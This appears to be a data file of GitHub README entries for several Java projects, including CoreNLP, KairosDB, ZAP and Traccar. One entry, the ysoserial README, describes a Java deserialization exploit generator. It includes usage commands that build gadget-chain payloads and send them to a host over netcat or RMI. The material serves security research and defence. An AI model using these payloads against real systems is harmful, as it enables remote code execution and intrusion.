# Stanford CoreNLP [![Run Tests](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml/badge.svg)](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml) [![Maven Central](https://img.shields.io/maven-central/v/edu.stanford.nlp/stanford-corenlp.svg)](https://mvnrepository.com/artifact/edu.stanford.nlp/stanford-corenlp) [![Twitter](https://img.shields.io/twitter/follow/stanfordnlp.svg?style=social&label=Follow)](https://twitter.com/stanfordnlp/) [Stanford CoreNLP](http://stanfordnlp.github.io/CoreNLP/) provides a set of natural language analysis tools written in Java. It can take raw human language text input and give the base forms of words, their parts of speech, whether they are names of companies, people, etc., normalize and interpret dates, times, and numeric quantities, mark up the structure of sentences in terms of syntactic phrases or dependencies, and indicate which noun phrases refer to the same entities. It was originally developed for English, but now also provides varying levels of support for (Modern Standard) Arabic, (mainland) Chinese, French, German, Hungarian, Italian, and Spanish. Stanford CoreNLP is an integrated framework, which makes it very easy to apply a bunch of language analysis tools to a piece of text. Starting from plain text, you can run all the tools with just two lines of code. Its analyses provide the foundational building blocks for higher-level and domain-specific text understanding applications. Stanford CoreNLP is a set of stable and well-tested natural language processing tools, widely used by various groups in academia, industry, and government. The tools variously use rule-based, probabilistic machine learning, and deep learning components. The Stanford CoreNLP code is written in Java and licensed under the GNU General Public License (v2 or later). Note that this is the full GPL, which allows many free uses, but not its use in proprietary software that you distribute to others. ### Build Instructions Several times a year we distribute a new version of the software, which corresponds to a stable commit. During the time between releases, one can always use the latest, under development version of our code. Here are some helpful instructions to use the latest code: #### Provided build Sometimes we will provide updated jars here which have the latest version of the code. At present, [the current released version of the code](https://stanfordnlp.github.io/CoreNLP/#download) is our most recent released jar, though you can always build the very latest from GitHub HEAD yourself. <!--- [stanford-corenlp.jar (last built: 2017-04-14)](http://nlp.stanford.edu/software/stanford-corenlp-2017-04-14-build.jar) --> #### Build with Ant 1. Make sure you have Ant installed, details here: [http://ant.apache.org/](http://ant.apache.org/) 2. Compile the code with this command: `cd CoreNLP ; ant` 3. Then run this command to build a jar with the latest version of the code: `cd CoreNLP/classes ; jar -cf ../stanford-corenlp.jar edu` 4. This will create a new jar called stanford-corenlp.jar in the CoreNLP folder which contains the latest code 5. The dependencies that work with the latest code are in CoreNLP/lib and CoreNLP/liblocal, so make sure to include those in your CLASSPATH. 6. When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-models](http://nlp.stanford.edu/software/stanford-english-corenlp-models-current.jar), and [english-models-kbp](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in. #### Build with Maven 1. Make sure you have Maven installed, details here: [https://maven.apache.org/](https://maven.apache.org/) 2. If you run this command in the CoreNLP directory: `mvn package` , it should run the tests and build this jar file: `CoreNLP/target/stanford-corenlp-4.5.4.jar` 3. When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-extra-models](http://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar), and [english-kbp-models](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in. 4. If you want to use Stanford CoreNLP as part of a Maven project you need to install the models jars into your Maven repository. Below is a sample command for installing the Spanish models jar. For other languages just change the language name in the command. To install `stanford-corenlp-models-current.jar` you will need to set `-Dclassifier=models`. Here is the sample command for Spanish: `mvn install:install-file -Dfile=/location/of/stanford-spanish-corenlp-models-current.jar -DgroupId=edu.stanford.nlp -DartifactId=stanford-corenlp -Dversion=4.5.4 -Dclassifier=models-spanish -Dpackaging=jar` #### Models The models jars that correspond to the latest code can be found in the table below. Some of the larger (English) models -- like the shift-reduce parser and WikiDict -- are not distributed with our default models jar. These require downloading the English (extra) and English (kbp) jars. Resources for other languages require usage of the corresponding models jar. The best way to get the models is to use git-lfs and clone them from Hugging Face Hub. For instance, to get the French models, run the following commands: ``` # Make sure you have git-lfs installed # (https://git-lfs.github.com/) git lfs install git clone https://huggingface.co/stanfordnlp/corenlp-french ``` The jars can be directly downloaded from the links below or the Hugging Face Hub page as well. | Language | Model Jar | Last Updated | | --- | --- | --- | | Arabic | [download](https://nlp.stanford.edu/software/stanford-arabic-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-arabic/tree/main) | 4.5.6 | | Chinese | [download](https://nlp.stanford.edu/software/stanford-chinese-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-chinese/tree/main)| 4.5.6 | | English (extra) | [download](https://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-extra/tree/main) | 4.5.6 | | English (KBP) | [download](https://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-kbp/tree/main) | 4.5.6 | | French | [download](https://nlp.stanford.edu/software/stanford-french-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-french/tree/main) | 4.5.6 | | German | [download](https://nlp.stanford.edu/software/stanford-german-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-german/tree/main) | 4.5.6 | | Hungarian | [download](https://nlp.stanford.edu/software/stanford-hungarian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-hungarian/tree/main) | 4.5.6 | | Italian | [download](https://nlp.stanford.edu/software/stanford-italian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-italian/tree/main)| 4.5.6 | | Spanish | [download](https://nlp.stanford.edu/software/stanford-spanish-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-spanish/tree/main)| 4.5.6 | Thank you to [Hugging Face](https://huggingface.co/) for helping with our hosting! ### Install by Gradle If you don't know Gradle itself, see official site: https://gradle.org Write the following in your build.gradle according to [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.5/jar): ```Gradle dependencies { implementation 'edu.stanford.nlp:stanford-corenlp:4.5.5' } ``` If you want to analyse English, add following: ```Gradle implementation "edu.stanford.nlp:stanford-corenlp:4.5.5:models" implementation "edu.stanford.nlp:stanford-corenlp:4.5.5:models-english" implementation "edu.stanford.nlp:stanford-corenlp:4.5.5:models-english-kbp" ``` If you use another version, replace "4.5.5" to a version you use. ### Useful resources You can find releases of Stanford CoreNLP on [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.4/jar). You can find more explanation and documentation on [the Stanford CoreNLP homepage](http://stanfordnlp.github.io/CoreNLP/). For information about making contributions to Stanford CoreNLP, see the file [CONTRIBUTING.md](CONTRIBUTING.md). Questions about CoreNLP can either be posted on StackOverflow with the tag [stanford-nlp](http://stackoverflow.com/questions/tagged/stanford-nlp), or on the [mailing lists](https://nlp.stanford.edu/software/#Mail).
0
kairosdb/kairosdb
Fast scalable time series database
java kairosdb metrics timeseries timeseries-database
![KairosDB](webroot/img/kairosdb.png) [![Build Status](https://travis-ci.org/kairosdb/kairosdb.svg?branch=develop)](https://travis-ci.org/kairosdb/kairosdb) KairosDB is a fast distributed scalable time series database written on top of Cassandra. ## Documentation Documentation is found [here](http://kairosdb.github.io/website/). [Frequently Asked Questions](https://github.com/kairosdb/kairosdb/wiki/Frequently-Asked-Questions) ## Installing Download the latest [KairosDB release](https://github.com/kairosdb/kairosdb/releases). Installation instructions are found [here](http://kairosdb.github.io/docs/build/html/GettingStarted.html) If you want to test KairosDB in Kubernetes please follow the instructions from [KairosDB Helm chart](deployment/helm/README.md). ## Getting Involved Join the [KairosDB discussion group](https://groups.google.com/forum/#!forum/kairosdb-group). ## Contributing to KairosDB Contributions to KairosDB are **very welcome**. KairosDB is mainly developed in Java, but there's a lot of tasks for non-Java programmers too, so don't feel shy and join us! What you can do for KairosDB: - [KairosDB Core](https://github.com/kairosdb/kairosdb): join the development of core features of KairosDB. - [Website](https://github.com/kairosdb/kairosdb.github.io): improve the KairosDB website. - [Documentation](https://github.com/kairosdb/kairosdb/wiki/Contribute:-Documentation): improve our documentation, it's a very important task. If you have any questions about how to contribute to KairosDB, [join our discussion group](https://groups.google.com/forum/#!forum/kairosdb-group) and tell us your issue. ## License The license is the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0)
0
frohoff/ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
deserialization exploit gadget java javadeser jvm poc serialization vulnerability
# ysoserial [![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) [![Travis Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial) [![Appveyor Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master) [![JitPack](https://jitpack.io/v/frohoff/ysoserial.svg)](https://jitpack.io/#frohoff/ysoserial) A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ![logo](ysoserial.png) ## Description Originally released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"]( https://frohoff.github.io/appseccali-marshalling-pickles/) with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x). Later updated to include additional gadget chains for [JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries. __ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host. It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath. ## Disclaimer This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. ## Usage ```shell $ java -jar ysoserial.jar Y SO SERIAL? Usage: java -jar ysoserial.jar [payload] '[command]' Available payload types: Payload Authors Dependencies ------- ------- ------------ AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 Clojure @JackOfMostTrades clojure:1.8.0 CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 CommonsCollections1 @frohoff commons-collections:3.1 CommonsCollections2 @frohoff commons-collections4:4.0 CommonsCollections3 @frohoff commons-collections:3.1 CommonsCollections4 @frohoff commons-collections4:4.0 CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 CommonsCollections6 @matthias_kaiser commons-collections:3.1 CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 Groovy1 @frohoff groovy:2.3.9 Hibernate1 @mbechler Hibernate2 @mbechler JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 JRMPClient @mbechler JRMPListener @mbechler JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 Jdk7u21 @frohoff Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 MozillaRhino1 @matthias_kaiser js:1.7R2 MozillaRhino2 @_tint0 js:1.7R2 Myfaces1 @mbechler Myfaces2 @mbechler ROME @mbechler rome:1.0 Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 URLDNS @gebl Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 ``` ## Examples ```shell $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat ... 0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov 0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride.......... 0000570: 0078 7071 007e 003a .xpq.~.: $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin $ nc 10.10.10.10 1099 < groovypayload.bin $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe ``` ## Installation [![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) Download the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases. ## Building Requires Java 1.7+ and Maven 3.x+ ```mvn clean package -DskipTests``` ## Code Status [![Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial) [![Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master) ## Contributing 1. Fork it 2. Create your feature branch (`git checkout -b my-new-feature`) 3. Commit your changes (`git commit -am 'Add some feature'`) 4. Push to the branch (`git push origin my-new-feature`) 5. Create new Pull Request ## See Also * [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc. * [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries * [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization
0
zouzg/mybatis-generator-gui
mybatis-generator界面工具,让你生成代码更简单更快捷
null
mybatis-generator-gui ============== mybatis-generator-gui是基于 [mybatis generator](http://www.mybatis.org/generator/index.html) 开发一款界面工具, 本工具可以使你非常容易及快速生成Mybatis的Java POJO文件及数据库Mapping文件。 ![image](https://user-images.githubusercontent.com/3505708/49334784-1a42c980-f619-11e8-914d-9ea85db9cec3.png) ![basic](https://user-images.githubusercontent.com/3505708/51911610-45754980-240d-11e9-85ad-643e55cafab2.png) ![overSSH](https://user-images.githubusercontent.com/3505708/51911646-5920b000-240d-11e9-9048-738306a56d14.png) ![SearchSupport](https://user-images.githubusercontent.com/8142133/115959972-881d2200-a541-11eb-8ad4-052f379b91f1.png) ### 核心特性 * 按照界面步骤轻松生成代码,省去XML繁琐的学习与配置过程 * 保存数据库连接与Generator配置,每次代码生成轻松搞定 * 内置常用插件,比如分页插件 * 支持OverSSH 方式,通过SSH隧道连接至公司内网访问数据库 * 把数据库中表列的注释生成为Java实体的注释,生成的实体清晰明了 * 可选的去除掉对版本管理不友好的注释,这样新增或删除字段重新生成的文件比较过来清楚 * 目前已经支持Mysql、Mysql8、Oracle、PostgreSQL与SQL Server,暂不对其他非主流数据库提供支持。(MySQL支持的比较好,其他数据库有什么问题可以在issue中反馈) ### 运行要求(重要!!!) 本工具仅支持Java的2个最新的LTS版本,jdk8和jdk11 * jdk1.8要求版本在<strong>1.8.0.60</strong>以上版本 * Java 11无版本要求 ### 直接运行(非必须) 推荐使用IDE直接运行,如果需要二进制安装包,可以关注公众号获取二进制安装版,目前支持Windows和MacOS,注意你的JDK是不是1.8,并且版本大于1.8.0.60 ### 启动本软件 * 方法一:关注微信公众号“搬砖头也要有态度”,回复“GUI”获取下载链接 ![image](https://user-images.githubusercontent.com/3505708/61360019-2893dc00-a8b0-11e9-8dc9-a020e997ab87.png) * 方法二: 自助构建 ```bash git clone https://github.com/zouzg/mybatis-generator-gui cd mybatis-generator-gui mvn jfx:jar cd target/jfx/app/ java -jar mybatis-generator-gui.jar ``` * 方法三: IDE中运行 Eclipse or IntelliJ IDEA中启动, 找到`com.zzg.mybatis.generator.MainUI`类并运行就可以了(主要你的IED运行的jdk版本是否符合要求) * 方法四:打包为本地原生应用,双击快捷方式即可启动,方便快捷 如果不想打包后的安装包logo为Java的灰色的茶杯,需要在pom文件里将对应操作系统平台的图标注释放开 ```bash #<icon>${project.basedir}/package/windows/mybatis-generator-gui.ico</icon>为windows #<icon>${project.basedir}/package/macosx/mybatis-generator-gui.icns</icon>为mac mvn jfx:native ``` 另外需要注意,windows系统打包成exe的话需要安装WiXToolset3+的环境;由于打包后会把jre打入安装包,两个平台均100M左右,体积较大请自行打包;打包后的安装包在target/jfx/native目录下 ### 注意事项 * 本自动生成代码工具只适合生成单表的增删改查,对于需要做数据库联合查询的,请自行写新的XML与Mapper; * 部分系统在中文输入方法时输入框中无法输入文字,请切换成英文输入法; * 如果不明白对应字段或选项是什么意思的时候,把光标放在对应字段或Label上停留一会然后如果有解释会出现解释; ### 文档 更多详细文档请参考本库的Wiki * [Usage](https://github.com/astarring/mybatis-generator-gui/wiki/Usage-Guide) ### 贡献 目前本工具只是本人项目人使用到了并且觉得非常有用所以把它开源,如果你觉得有用并且想改进本软件,你可以: * 对于你认为有用的功能,你可以在Issue提,我可以开发的尽量满足 * 对于有Bug的地方,请按如下方式在Issue中提bug * 如何重现你的bug,包括你使用的系统,JDK版本,数据库类型及版本 * 如果有任何的错误截图会更好 * 如果你是一些常见的数据库连接、软件启动不了等问题,请先仔细阅读上面的文档,再解决不了在下面的QQ群中问(问问题的时候尽量把各种信息都提供好,否则只是几行文字是没有人愿意为你解答的)。 ### QQ群 鉴于有的同学可能有一些特殊情况不能使用,我建了一个钉钉群供大家交流,钉钉群号:35412531 (原QQ群已不再提供,QQ不方便打开) - - - Licensed under the Apache 2.0 License Copyright 2017 by Owen Zou
0
apache/cassandra
Mirror of Apache Cassandra
cassandra database java
null
0
zaproxy/zaproxy
The ZAP core project
appsec dast hacktoberfest security security-scanner zap zap-development zaproxy
# [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap32x32.png) ZAP](https://www.zaproxy.org) [![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) [![GitHub release](https://img.shields.io/github/release/zaproxy/zaproxy.svg)](https://www.zaproxy.org/download/) [![Java CI](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/24/badge)](https://bestpractices.coreinfrastructure.org/projects/24) [![Github Releases](https://img.shields.io/github/downloads/zaproxy/zaproxy/latest/total.svg?maxAge=2592000)](https://zapbot.github.io/zap-mgmt-scripts/downloads.html) [![javadoc](https://javadoc.io/badge2/org.zaproxy/zap/javadoc.svg)](https://javadoc.io/doc/org.zaproxy/zap) [![CodeQL](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml) [![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=zaproxy_zaproxy&metric=alert_status)](https://sonarcloud.io/dashboard?id=zaproxy_zaproxy) [![Open Source Helpers](https://www.codetriage.com/zaproxy/zaproxy/badges/users.svg)](https://www.codetriage.com/zaproxy/zaproxy) [![Twitter Follow](https://img.shields.io/twitter/follow/zaproxy.svg?style=social&label=Follow&maxAge=2592000)](https://twitter.com/zaproxy) ![Integration Tests](https://github.com/zaproxy/zaproxy/actions/workflows/run-integration-tests.yml/badge.svg) ![Docker Live Release](https://github.com/zaproxy/zaproxy/actions/workflows/release-live-docker.yml/badge.svg) The Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing. [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/ZAP-Download.png)](https://www.zaproxy.org/download/) For more details about ZAP see the new ZAP website at [zaproxy.org](https://www.zaproxy.org/) [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap-website.png)](https://www.zaproxy.org/)
0
traccar/traccar
Traccar GPS Tracking System
gps gps-tracking hacktoberfest java traccar
# [Traccar](https://www.traccar.org) ## Overview Traccar is an open source GPS tracking system. This repository contains Java-based back-end service. It supports more than 200 GPS protocols and more than 2000 models of GPS tracking devices. Traccar can be used with any major SQL database system. It also provides easy to use [REST API](https://www.traccar.org/traccar-api/). Other parts of Traccar solution include: - [Traccar web app](https://github.com/traccar/traccar-web) - [Traccar Manager Android app](https://github.com/traccar/traccar-manager-android) - [Traccar Manager iOS app](https://github.com/traccar/traccar-manager-ios) There is also a set of mobile apps that you can use for tracking mobile devices: - [Traccar Client Android app](https://github.com/traccar/traccar-client-android) - [Traccar Client iOS app](https://github.com/traccar/traccar-client-ios) ## Features Some of the available features include: - Real-time GPS tracking - Driver behaviour monitoring - Detailed and summary reports - Geofencing functionality - Alarms and notifications - Account and device management - Email and SMS support ## Build Please read [build from source documentation](https://www.traccar.org/build/) on the official website. ## Team - Anton Tananaev ([anton@traccar.org](mailto:anton@traccar.org)) - Andrey Kunitsyn ([andrey@traccar.org](mailto:andrey@traccar.org)) ## License Apache License, Version 2.0 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
648540858/wvp-GB28181-pro
WEB VIDEO PLATFORM是一个基于GB28181-2016标准实现的网络视频平台,支持NAT穿透,支持海康、大华、宇视等品牌的IPC、NVR、DVR接入。支持国标级联,支持rtsp/rtmp等视频流转发到国标平台,支持rtsp/rtmp等推流转发到国标平台。
28181 28181web gb28181 gb28181server wvp
![logo](doc/_media/logo.png) # 开箱即用的28181协议视频平台 [![Build Status](https://travis-ci.org/xia-chu/ZLMediaKit.svg?branch=master)](https://travis-ci.org/xia-chu/ZLMediaKit) [![license](http://img.shields.io/badge/license-MIT-green.svg)](https://github.com/xia-chu/ZLMediaKit/blob/master/LICENSE) [![JAVA](https://img.shields.io/badge/language-java-red.svg)](https://en.cppreference.com/) [![platform](https://img.shields.io/badge/platform-linux%20|%20macos%20|%20windows-blue.svg)](https://github.com/xia-chu/ZLMediaKit) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-yellow.svg)](https://github.com/xia-chu/ZLMediaKit/pulls) WEB VIDEO PLATFORM是一个基于GB28181-2016标准实现的开箱即用的网络视频平台,负责实现核心信令与设备管理后台部分,支持NAT穿透,支持海康、大华、宇视等品牌的IPC、NVR接入。支持国标级联,支持将不带国标功能的摄像机/直播流/直播推流转发到其他国标平台。 流媒体服务基于@夏楚 ZLMediaKit [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit) 播放器使用@dexter jessibuca [https://github.com/langhuihui/jessibuca/tree/v3](https://github.com/langhuihui/jessibuca/tree/v3) 前端页面基于@Kyle MediaServerUI [https://gitee.com/kkkkk5G/MediaServerUI](https://gitee.com/kkkkk5G/MediaServerUI) 进行修改. # 应用场景: 支持浏览器无插件播放摄像头视频。 支持国标设备(摄像机、平台、NVR等)设备接入 支持非国标(onvif, rtsp, rtmp,直播设备等等)设备接入,充分利旧。 支持国标级联。多平台级联。跨网视频预览。 支持跨网网闸平台互联。 # 文档 wvp使用文档 [https://doc.wvp-pro.cn](https://doc.wvp-pro.cn) ZLM使用文档 [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit) # 付费社群 [![社群](doc/_media/shequ.png "shequ")](https://t.zsxq.com/0d8VAD3Dm) > 收费是为了提供更好的服务,也是对作者更大的激励。加入星球的用户三天后可以私信我留下微信号,我会拉大家入群。加入三天内不满意可以直接退款,大家不需要有顾虑,来白嫖三天也不是不可以。 # gitee同步仓库 https://gitee.com/pan648540858/wvp-GB28181-pro.git # 截图 ![index](doc/_media/index.png "index.png") ![2](doc/_media/2.png "2.png") ![3](doc/_media/3.png "3.png") ![3-1](doc/_media/3-1.png "3-1.png") ![3-2](doc/_media/3-2.png "3-2.png") ![3-3](doc/_media/3-3.png "3-3.png") ![build_1](https://images.gitee.com/uploads/images/2022/0304/101919_ee5b8c79_1018729.png "2022-03-04_10-13.png") # 功能特性 - [X] 集成web界面 - [X] 兼容性良好 - [X] 支持电子地图,支持接入WGS84和GCJ02两种坐标系,并且自动转化为合适的坐标系进行展示和分发 - [X] 接入设备 - [X] 视频预览 - [X] 支持主码流子码流切换 - [X] 无限制接入路数,能接入多少设备只取决于你的服务器性能 - [X] 云台控制,控制设备转向,拉近,拉远 - [X] 预置位查询,使用与设置 - [X] 查询NVR/IPC上的录像与播放,支持指定时间播放与下载 - [X] 无人观看自动断流,节省流量 - [X] 视频设备信息同步 - [X] 离在线监控 - [X] 支持直接输出RTSP、RTMP、HTTP-FLV、Websocket-FLV、HLS多种协议流地址 - [X] 支持通过一个流地址直接观看摄像头,无需登录以及调用任何接口 - [X] 支持UDP和TCP两种国标信令传输模式 - [X] 支持UDP和TCP两种国标流传输模式 - [X] 支持检索,通道筛选 - [X] 支持通道子目录查询 - [X] 支持过滤音频,防止杂音影响观看 - [X] 支持国标网络校时 - [X] 支持播放H264和H265 - [X] 报警信息处理,支持向前端推送报警信息 - [X] 语音对讲 - [X] 支持订阅与通知方法 - [X] 移动位置订阅 - [X] 移动位置通知处理 - [X] 报警事件订阅 - [X] 报警事件通知处理 - [X] 设备目录订阅 - [X] 设备目录通知处理 - [X] 移动位置查询和显示 - [X] 支持手动添加设备和给设备设置单独的密码 - [X] 支持平台对接接入 - [X] 支持国标级联 - [X] 国标通道向上级联 - [X] WEB添加上级平台 - [X] 注册 - [X] 心跳保活 - [X] 通道选择 - [X] 通道推送 - [X] 点播 - [X] 云台控制 - [X] 平台状态查询 - [X] 平台信息查询 - [X] 平台远程启动 - [X] 每个级联平台可自定义的虚拟目录 - [X] 目录订阅与通知 - [X] 录像查看与播放 - [X] GPS订阅与通知(直播推流) - [X] 语音对讲 - [X] 支持自动配置ZLM媒体服务, 减少因配置问题所出现的问题; - [X] 多流媒体节点,自动选择负载最低的节点使用。 - [X] 支持启用udp多端口模式, 提高udp模式下媒体传输性能; - [X] 支持公网部署; - [X] 支持wvp与zlm分开部署,提升平台并发能力 - [X] 支持拉流RTSP/RTMP,分发为各种流格式,或者推送到其他国标平台 - [X] 支持推流RTSP/RTMP,分发为各种流格式,或者推送到其他国标平台 - [X] 支持推流鉴权 - [X] 支持接口鉴权 - [X] 云端录像,推流/代理/国标视频均可以录制在云端服务器,支持预览和下载 - [X] 支持打包可执行jar和war - [X] 支持跨域请求,支持前后端分离部署 - [X] 支持Mysql,Postgresql,金仓等数据库 - [X] 支持Onvif(目前在onvif分支,需要安装onvif服务,服务请在知识星球获取) # 非开源的内容 - [X] ONVIF设备的接入,支持点播,云台控制,国标级联点播,自动点播。在[知识星球](https://t.zsxq.com/10WAnH2MP)放了试用安装包以及使用教程,没有使用时间限制,需要源码可以星球私信我或者邮箱联系。 - [X] 支持国标28181-2022协议,支持巡航轨迹查询,PTZ精准控制,存储卡格式化,设备软件升级,OSD配置,h265+aac,支持辅码流,录像倒放等。具体的功能列表可在[知识星球](https://t.zsxq.com/18GXkpkqs)查看,需要源码和测试可以在星球私信联系或者发邮件给我 # 授权协议 本项目自有代码使用宽松的MIT协议,在保留版权信息的情况下可以自由应用于各自商用、非商业的项目。 但是本项目也零碎的使用了一些其他的开源代码,在商用的情况下请自行替代或剔除; 由于使用本项目而产生的商业纠纷或侵权行为一概与本项目及开发者无关,请自行承担法律风险。 在使用本项目代码时,也应该在授权协议中同时表明本项目依赖的第三方库的协议 # 技术支持 [知识星球](https://t.zsxq.com/0d8VAD3Dm)专栏列表:, - [使用入门系列一:WVP-PRO能做什么](https://t.zsxq.com/0dLguVoSp) 有偿技术支持,请发送邮件到648540858@qq.com # 致谢 感谢作者[夏楚](https://github.com/xia-chu) 提供这么棒的开源流媒体服务框架,并在开发过程中给予支持与帮助。 感谢作者[dexter langhuihui](https://github.com/langhuihui) 开源这么好用的WEB播放器。 感谢作者[Kyle](https://gitee.com/kkkkk5G) 开源了好用的前端页面 感谢各位大佬的赞助以及对项目的指正与帮助。包括但不限于代码贡献、问题反馈、资金捐赠等各种方式的支持!以下排名不分先后: [lawrencehj](https://github.com/lawrencehj) [Smallwhitepig](https://github.com/Smallwhitepig) [swwhaha](https://github.com/swwheihei) 